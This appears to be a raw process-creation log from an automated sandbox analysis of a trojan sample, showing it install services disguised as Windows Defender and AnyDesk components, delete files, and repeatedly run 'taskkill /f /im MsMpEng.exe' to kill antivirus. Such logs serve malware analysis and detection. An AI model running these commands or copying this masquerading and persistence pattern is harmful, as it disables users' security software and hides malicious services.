Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeProcess created: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe "C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe" installJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeProcess created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 2404Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 6636Jump to behavior
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc start MicrosoftWindowsDefenderCoreServiceJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc start MicrosoftWindowsDefenderCoreServiceJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreServiceJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 2128Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe installJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: unknown unknown
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 6552
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
